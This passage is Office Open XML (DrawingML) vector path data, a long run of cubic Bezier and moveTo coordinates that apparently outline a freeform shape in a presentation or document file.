                  <a:cubicBezTo>
                    <a:pt x="322" y="313"/>
                    <a:pt x="322" y="314"/>
                    <a:pt x="322" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="315"/>
                    <a:pt x="321" y="315"/>
                    <a:pt x="321" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="316"/>
                    <a:pt x="321" y="316"/>
                    <a:pt x="321" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="317"/>
                    <a:pt x="320" y="318"/>
                    <a:pt x="322" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="318"/>
                    <a:pt x="323" y="318"/>
                    <a:pt x="324" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="324" y="317"/>
                    <a:pt x="324" y="317"/>
                    <a:pt x="324" y="317"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="324" y="316"/>
                    <a:pt x="324" y="316"/>
                    <a:pt x="324" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="324" y="316"/>
                    <a:pt x="325" y="315"/>
                    <a:pt x="324" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="324" y="314"/>
                    <a:pt x="324" y="314"/>
                    <a:pt x="324" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="314"/>
                    <a:pt x="323" y="314"/>
                    <a:pt x="323" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="313"/>
                    <a:pt x="323" y="313"/>
                    <a:pt x="323" y="311"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="310"/>
                    <a:pt x="323" y="310"/>
                    <a:pt x="323" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="310"/>
                    <a:pt x="323" y="310"/>
                    <a:pt x="322" y="308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="322" y="308"/>
                    <a:pt x="321" y="308"/>
                    <a:pt x="321" y="308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="307"/>
                    <a:pt x="321" y="307"/>
                    <a:pt x="321" y="307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="307"/>
                    <a:pt x="321" y="306"/>
                    <a:pt x="321" y="306"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="322" y="306"/>
                    <a:pt x="323" y="306"/>
                    <a:pt x="323" y="306"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="324" y="306"/>
                    <a:pt x="324" y="305"/>
                    <a:pt x="325" y="305"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="326" y="305"/>
                    <a:pt x="327" y="305"/>
                    <a:pt x="327" y="305"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327" y="305"/>
                    <a:pt x="327" y="305"/>
                    <a:pt x="327" y="305"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="328" y="304"/>
                    <a:pt x="328" y="304"/>
                    <a:pt x="328" y="304"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="334" y="295"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="334" y="295"/>
                    <a:pt x="334" y="295"/>
                    <a:pt x="334" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="334" y="295"/>
                    <a:pt x="334" y="295"/>
                    <a:pt x="334" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="295"/>
                    <a:pt x="333" y="295"/>
                    <a:pt x="332" y="296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="329" y="296"/>
                    <a:pt x="325" y="296"/>
                    <a:pt x="322" y="296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="296"/>
                    <a:pt x="320" y="297"/>
                    <a:pt x="320" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="317" y="298"/>
                    <a:pt x="317" y="298"/>
                    <a:pt x="317" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="317" y="298"/>
                    <a:pt x="317" y="298"/>
                    <a:pt x="317" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="316" y="299"/>
                    <a:pt x="316" y="300"/>
                    <a:pt x="316" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="317" y="300"/>
                    <a:pt x="318" y="300"/>
                    <a:pt x="318" y="300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="319" y="299"/>
                    <a:pt x="319" y="299"/>
                    <a:pt x="319" y="299"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320" y="298"/>
                    <a:pt x="320" y="298"/>
                    <a:pt x="321" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="298"/>
                    <a:pt x="321" y="298"/>
                    <a:pt x="321" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="322" y="297"/>
                    <a:pt x="322" y="297"/>
                    <a:pt x="322" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="298"/>
                    <a:pt x="323" y="298"/>
                    <a:pt x="323" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="324" y="298"/>
                    <a:pt x="326" y="298"/>
                    <a:pt x="327" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="328" y="298"/>
                    <a:pt x="328" y="298"/>
                    <a:pt x="329" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="329" y="299"/>
                    <a:pt x="329" y="299"/>
                    <a:pt x="329" y="299"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="330" y="299"/>
                    <a:pt x="330" y="299"/>
                    <a:pt x="331" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="331" y="298"/>
                    <a:pt x="331" y="297"/>
                    <a:pt x="332" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="298"/>
                    <a:pt x="332" y="298"/>
                    <a:pt x="332" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="297"/>
                    <a:pt x="334" y="297"/>
                    <a:pt x="334" y="295"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="323" y="333"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="333"/>
                    <a:pt x="323" y="333"/>
                    <a:pt x="323" y="333"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="333"/>
                    <a:pt x="323" y="333"/>
                    <a:pt x="323" y="333"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="335" y="328"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="335" y="328"/>
                    <a:pt x="335" y="328"/>
                    <a:pt x="335" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="335" y="328"/>
                    <a:pt x="335" y="328"/>
                    <a:pt x="335" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="334" y="327"/>
                    <a:pt x="334" y="327"/>
                    <a:pt x="334" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="334" y="327"/>
                    <a:pt x="333" y="327"/>
                    <a:pt x="333" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="327"/>
                    <a:pt x="332" y="327"/>
                    <a:pt x="331" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="331" y="328"/>
                    <a:pt x="331" y="328"/>
                    <a:pt x="330" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="330" y="328"/>
                    <a:pt x="329" y="328"/>
                    <a:pt x="329" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="328" y="329"/>
                    <a:pt x="328" y="329"/>
                    <a:pt x="328" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327" y="329"/>
                    <a:pt x="327" y="329"/>
                    <a:pt x="327" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327" y="329"/>
                    <a:pt x="327" y="330"/>
                    <a:pt x="327" y="330"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="325" y="330"/>
                    <a:pt x="325" y="330"/>
                    <a:pt x="325" y="330"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="324" y="331"/>
                    <a:pt x="324" y="331"/>
                    <a:pt x="324" y="331"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="324" y="331"/>
                    <a:pt x="323" y="331"/>
                    <a:pt x="323" y="331"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="332"/>
                    <a:pt x="323" y="332"/>
                    <a:pt x="323" y="332"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="332"/>
                    <a:pt x="323" y="332"/>
                    <a:pt x="323" y="332"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="332"/>
                    <a:pt x="323" y="332"/>
                    <a:pt x="323" y="332"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="332"/>
                    <a:pt x="323" y="332"/>
                    <a:pt x="323" y="332"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="333"/>
                    <a:pt x="323" y="333"/>
                    <a:pt x="323" y="333"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="333"/>
                    <a:pt x="325" y="334"/>
                    <a:pt x="325" y="334"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="326" y="333"/>
                    <a:pt x="326" y="333"/>
                    <a:pt x="326" y="333"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="328" y="331"/>
                    <a:pt x="328" y="331"/>
                    <a:pt x="328" y="331"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="329" y="330"/>
                    <a:pt x="330" y="331"/>
                    <a:pt x="331" y="330"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="331" y="330"/>
                    <a:pt x="331" y="329"/>
                    <a:pt x="332" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="329"/>
                    <a:pt x="333" y="329"/>
                    <a:pt x="333" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="335" y="329"/>
                    <a:pt x="335" y="329"/>
                    <a:pt x="335" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="335" y="328"/>
                    <a:pt x="335" y="328"/>
                    <a:pt x="335" y="328"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="322" y="336"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="322" y="336"/>
                    <a:pt x="322" y="336"/>
                    <a:pt x="322" y="335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="322" y="335"/>
                    <a:pt x="322" y="335"/>
                    <a:pt x="322" y="335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="335"/>
                    <a:pt x="321" y="335"/>
                    <a:pt x="320" y="335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320" y="336"/>
                    <a:pt x="320" y="336"/>
                    <a:pt x="320" y="336"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320" y="336"/>
                    <a:pt x="321" y="336"/>
                    <a:pt x="322" y="336"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="327" y="327"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="327" y="327"/>
                    <a:pt x="327" y="327"/>
                    <a:pt x="327" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327" y="326"/>
                    <a:pt x="327" y="326"/>
                    <a:pt x="327" y="326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327" y="326"/>
                    <a:pt x="327" y="326"/>
                    <a:pt x="327" y="326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="326" y="327"/>
                    <a:pt x="326" y="327"/>
                    <a:pt x="326" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="326" y="327"/>
                    <a:pt x="326" y="327"/>
                    <a:pt x="326" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="325" y="327"/>
                    <a:pt x="325" y="327"/>
                    <a:pt x="324" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="324" y="327"/>
                    <a:pt x="323" y="327"/>
                    <a:pt x="322" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="322" y="327"/>
                    <a:pt x="322" y="327"/>
                    <a:pt x="322" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="327"/>
                    <a:pt x="320" y="328"/>
                    <a:pt x="320" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="318" y="328"/>
                    <a:pt x="318" y="328"/>
                    <a:pt x="318" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="318" y="327"/>
                    <a:pt x="315" y="327"/>
                    <a:pt x="314" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="314" y="327"/>
                    <a:pt x="314" y="328"/>
                    <a:pt x="313" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="312" y="328"/>
                    <a:pt x="312" y="328"/>
                    <a:pt x="312" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="313" y="328"/>
                    <a:pt x="313" y="329"/>
                    <a:pt x="314" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="314" y="329"/>
                    <a:pt x="314" y="329"/>
                    <a:pt x="317" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="318" y="329"/>
                    <a:pt x="318" y="329"/>
                    <a:pt x="318" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320" y="329"/>
                    <a:pt x="320" y="329"/>
                    <a:pt x="321" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="329"/>
                    <a:pt x="322" y="329"/>
                    <a:pt x="323" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="329"/>
                    <a:pt x="323" y="329"/>
                    <a:pt x="323" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="328"/>
                    <a:pt x="323" y="328"/>
                    <a:pt x="324" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="325" y="328"/>
                    <a:pt x="325" y="328"/>
                    <a:pt x="325" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="326" y="328"/>
                    <a:pt x="326" y="328"/>
                    <a:pt x="327" y="327"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="315" y="334"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="315" y="334"/>
                    <a:pt x="315" y="334"/>
                    <a:pt x="315" y="334"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="315" y="333"/>
                    <a:pt x="315" y="333"/>
                    <a:pt x="315" y="333"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="314" y="333"/>
                    <a:pt x="314" y="332"/>
                    <a:pt x="314" y="332"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="314" y="332"/>
                    <a:pt x="314" y="332"/>
                    <a:pt x="314" y="332"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="314" y="332"/>
                    <a:pt x="314" y="332"/>
                    <a:pt x="314" y="332"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="313" y="331"/>
                    <a:pt x="313" y="331"/>
                    <a:pt x="313" y="331"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="312" y="331"/>
                    <a:pt x="312" y="331"/>
                    <a:pt x="312" y="331"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="312" y="331"/>
                    <a:pt x="312" y="330"/>
                    <a:pt x="311" y="330"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="311" y="330"/>
                    <a:pt x="311" y="330"/>
                    <a:pt x="310" y="331"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="310" y="332"/>
                    <a:pt x="310" y="332"/>
                    <a:pt x="310" y="332"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="311" y="333"/>
                    <a:pt x="311" y="333"/>
                    <a:pt x="311" y="333"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="311" y="334"/>
                    <a:pt x="311" y="334"/>
                    <a:pt x="311" y="334"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="312" y="334"/>
                    <a:pt x="312" y="334"/>
                    <a:pt x="315" y="334"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="311" y="328"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="311" y="328"/>
                    <a:pt x="311" y="328"/>
                    <a:pt x="311" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="311" y="328"/>
                    <a:pt x="311" y="328"/>
                    <a:pt x="311" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="311" y="327"/>
                    <a:pt x="311" y="327"/>
                    <a:pt x="311" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="310" y="328"/>
                    <a:pt x="310" y="328"/>
                    <a:pt x="309" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="309" y="327"/>
                    <a:pt x="309" y="327"/>
                    <a:pt x="309" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="309" y="327"/>
                    <a:pt x="309" y="327"/>
                    <a:pt x="309" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="308" y="327"/>
                    <a:pt x="308" y="327"/>
                    <a:pt x="308" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="307" y="327"/>
                    <a:pt x="307" y="327"/>
                    <a:pt x="307" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="307" y="327"/>
                    <a:pt x="307" y="327"/>
                    <a:pt x="306" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="306" y="327"/>
                    <a:pt x="306" y="327"/>
                    <a:pt x="306" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="305" y="328"/>
                    <a:pt x="305" y="328"/>
                    <a:pt x="305" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="305" y="328"/>
                    <a:pt x="305" y="328"/>
                    <a:pt x="305" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="305" y="328"/>
                    <a:pt x="304" y="328"/>
                    <a:pt x="304" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="303" y="328"/>
                    <a:pt x="303" y="328"/>
                    <a:pt x="303" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="303" y="329"/>
                    <a:pt x="303" y="329"/>
                    <a:pt x="304" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="306" y="329"/>
                    <a:pt x="306" y="329"/>
                    <a:pt x="306" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="306" y="329"/>
                    <a:pt x="307" y="329"/>
                    <a:pt x="307" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="308" y="328"/>
                    <a:pt x="308" y="328"/>
                    <a:pt x="308" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="308" y="328"/>
                    <a:pt x="309" y="328"/>
                    <a:pt x="309" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="310" y="329"/>
                    <a:pt x="310" y="329"/>
                    <a:pt x="311" y="328"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="300" y="329"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="300" y="329"/>
                    <a:pt x="300" y="329"/>
                    <a:pt x="300" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="300" y="328"/>
                    <a:pt x="300" y="327"/>
                    <a:pt x="299" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="298" y="327"/>
                    <a:pt x="298" y="327"/>
                    <a:pt x="298" y="326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="296" y="326"/>
                    <a:pt x="295" y="326"/>
                    <a:pt x="293" y="326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="324"/>
                    <a:pt x="295" y="325"/>
                    <a:pt x="297" y="324"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="296" y="324"/>
                    <a:pt x="295" y="323"/>
                    <a:pt x="295" y="323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="291" y="323"/>
                    <a:pt x="291" y="323"/>
                    <a:pt x="291" y="323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="289" y="323"/>
                    <a:pt x="288" y="322"/>
                    <a:pt x="286" y="322"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="281" y="322"/>
                    <a:pt x="274" y="322"/>
                    <a:pt x="269" y="323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="269" y="323"/>
                    <a:pt x="269" y="323"/>
                    <a:pt x="269" y="323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="269" y="323"/>
                    <a:pt x="270" y="323"/>
                    <a:pt x="271" y="323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="271" y="324"/>
                    <a:pt x="271" y="324"/>
                    <a:pt x="271" y="325"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="272" y="325"/>
                    <a:pt x="272" y="325"/>
                    <a:pt x="273" y="325"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="274" y="325"/>
                    <a:pt x="274" y="326"/>
                    <a:pt x="275" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="276" y="327"/>
                    <a:pt x="277" y="326"/>
                    <a:pt x="279" y="326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="280" y="326"/>
                    <a:pt x="281" y="326"/>
                    <a:pt x="282" y="326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="282" y="326"/>
                    <a:pt x="282" y="327"/>
                    <a:pt x="283" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284" y="327"/>
                    <a:pt x="285" y="326"/>
                    <a:pt x="287" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="288" y="329"/>
                    <a:pt x="288" y="329"/>
                    <a:pt x="290" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="291" y="328"/>
                    <a:pt x="291" y="327"/>
                    <a:pt x="291" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="292" y="327"/>
                    <a:pt x="292" y="328"/>
                    <a:pt x="293" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="328"/>
                    <a:pt x="293" y="328"/>
                    <a:pt x="294" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="296" y="327"/>
                    <a:pt x="297" y="330"/>
                    <a:pt x="299" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="300" y="329"/>
                    <a:pt x="300" y="329"/>
                    <a:pt x="300" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="300" y="329"/>
                    <a:pt x="300" y="329"/>
                    <a:pt x="300" y="329"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="259" y="320"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="259" y="319"/>
                    <a:pt x="259" y="319"/>
                    <a:pt x="259" y="319"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="259" y="318"/>
                    <a:pt x="259" y="318"/>
                    <a:pt x="259" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="259" y="318"/>
                    <a:pt x="259" y="318"/>
                    <a:pt x="259" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="258" y="318"/>
                    <a:pt x="258" y="318"/>
                    <a:pt x="258" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="258" y="319"/>
                    <a:pt x="258" y="319"/>
                    <a:pt x="258" y="319"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="259" y="320"/>
                    <a:pt x="259" y="320"/>
                    <a:pt x="259" y="320"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="317" y="283"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="317" y="283"/>
                    <a:pt x="317" y="283"/>
                    <a:pt x="317" y="283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6" y="281"/>
                    <a:pt x="314" y="281"/>
                    <a:pt x="314" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="314" y="281"/>
                    <a:pt x="312" y="280"/>
                    <a:pt x="312" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="312" y="279"/>
                    <a:pt x="312" y="279"/>
                    <a:pt x="312" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="311" y="277"/>
                    <a:pt x="311" y="277"/>
                    <a:pt x="311" y="277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="310" y="276"/>
                    <a:pt x="310" y="276"/>
                    <a:pt x="310" y="276"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="309" y="278"/>
                    <a:pt x="307" y="279"/>
                    <a:pt x="305" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="304" y="281"/>
                    <a:pt x="304" y="283"/>
                    <a:pt x="302" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="301" y="285"/>
                    <a:pt x="300" y="285"/>
                    <a:pt x="299" y="286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="298" y="286"/>
                    <a:pt x="297" y="287"/>
                    <a:pt x="297" y="288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6" y="289"/>
                    <a:pt x="295" y="290"/>
                    <a:pt x="294" y="291"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="291"/>
                    <a:pt x="293" y="291"/>
                    <a:pt x="291" y="291"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="291" y="293"/>
                    <a:pt x="291" y="294"/>
                    <a:pt x="291" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="289" y="295"/>
                    <a:pt x="288" y="296"/>
                    <a:pt x="287" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="286" y="295"/>
                    <a:pt x="286" y="295"/>
                    <a:pt x="286" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="285" y="294"/>
                    <a:pt x="285" y="294"/>
                    <a:pt x="285" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284" y="294"/>
                    <a:pt x="284" y="294"/>
                    <a:pt x="284" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284" y="294"/>
                    <a:pt x="284" y="294"/>
                    <a:pt x="284" y="294"/>
                  </a:cubicBezTo>
